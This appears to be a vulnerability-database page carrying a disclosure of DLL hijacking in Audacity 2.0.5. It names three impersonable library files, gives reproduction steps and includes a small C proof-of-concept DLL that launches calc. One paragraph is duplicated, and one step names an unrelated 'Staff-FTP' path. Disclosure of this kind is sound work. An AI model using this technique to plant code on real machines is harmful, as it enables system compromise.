Vulners
Lucene search
Audacity 2.0.5 DLL Hijack
`A local dll injection vulnerability has been discovered in the official Audacity 2.0.5.
Since the program is not specified with a fully qualified path name the program uses a fixed path to look for specific files or libraries. This path includes directories that may not be trusted or under user control. By placing a custom version of the file or library in the path, the program will load it before the legitimate version. This allows a local attacker to inject custom code that will be run with the privilege of the program or user executing the program. This attack can be leveraged remotely in some cases by placing the malicious file or library on a network share or extracted archive downloaded from a remote source. This can be done by tricking a user into running a hostile script from the local file system or a USB drive in some cases.
Since the program is not specified with a fully qualified path name the program uses a fixed path to look for specific files or libraries. This path includes directories that may not be trusted or under user control. By placing a custom version of the file or library in the path, the program will load it before the legitimate version. This allows a local attacker to inject custom code that will be run with the privilege of the program or user executing the program. This attack can be leveraged remotely in some cases by placing the malicious file or library on a network share or extracted archive downloaded from a remote source. This can be done by tricking a user into running a hostile script from the local file system or a USB drive in some cases.
When a malicious dll is created with the following names:
avformat-52.dll
avutil-50.dll
avcodec-52.dll
and placed in the directory of the installed audacity C:\Program Files (x86)\Audacity . And when Audacity will be started by the legitmate user it will start the process and just close by and in meanwhile the code within the malicious DLL will be executed and can lead to total compromise the system in which it is installed
Vulnerability Information:
Class: DLL Hijacking
Impact: System access
Remotely Exploitable: Yes
Locally Exploitable: Yes
Vulnerable Software:
[+] Audacity
Vulnerable Version(s):
[+] v2.0.5
Vulnerable Libraries:
[+]avformat-52.dll
[+]avutil-50.dll
[+]avcodec-52.dll
Proof of Concept (PoC):
=======================
Manual steps to reproduce the local vulnerability ...
1. Compile dll and rename to avformat-52.dll , avutil-50.dll , avcodec-52.dll
2. Copy avformat-52.dll to C:\Program Files\Staff-FTP
3. Launch Audacity
PoC: Exploit
#include <windows.h>
int alpdaemon()
{
WinExec("calc", SW_SHOW);
exit(0);
return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
alpdaemon();
return 0;
}
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 May 2015 00:00Current
0.1Low risk
Vulners AI Score0.1